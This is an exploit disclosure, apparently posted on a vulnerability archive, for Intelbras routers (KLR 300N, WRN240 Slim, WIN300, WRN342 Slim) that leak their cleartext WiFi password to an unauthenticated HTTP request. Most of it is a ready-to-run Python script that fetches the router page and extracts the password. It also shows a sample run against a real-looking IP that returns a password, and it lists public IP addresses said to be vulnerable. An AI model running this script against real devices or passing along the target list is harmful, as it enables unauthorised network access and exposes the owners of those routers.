Intelbras Roteadores – Remote WiFi Password Disclosure (Authentication Bypass)

2020.02.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title: Intelbras Roteadores – Remote WiFi Password Disclosure Date: 2020-02-09 Author: Nir Yehoshua Vendor Homepage: http://intelbras.com.br/ Vulnerable Routers: KLR 300N, N WRN240 Slim, N WIN300 and N WRN342 Slim. Details: The following routers: KLR 300N, N WRN240 Slim, N WIN300 and N WRN342 Slim from Intelbras (Brazilian company) are saving the password in cleartext without any encryption/hashing algorithm. An attacker can send an HTTP request to the router and get the password. #################### Python code: import requests print 'Remote WiFi Password disclosure, Please enter the victim address: (Use http / https://<IP>:PORT/index.asp)' user_input = raw_input("> ") checker = requests.get(user_input) if 'def_wirelesspassword' in checker.content: # The password variable print "Vulnerable" details = checker.content.split("def_wirelesspassword")[1].split('\n')[0].replace('= "','').replace('";','') # Quick and dirty split method print 'wifi password is:',details else: print "Not Vulnerable" exit() Example usage: Remote WiFi Password disclosure, Please enter the victim address: (Use http / Https://<IP>:PORT/index.asp) > http://77.70.110.152:8080/index.asp Vulnerable wifi password is: 0896676565 #################### List of vulnerable devices: 45.162.145.38:80 45.191.10.242:8080 45.228.114.23:8080 168.194.158.224:8888 177.101.3.136:8080 And more than 1,500 over the globe.


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top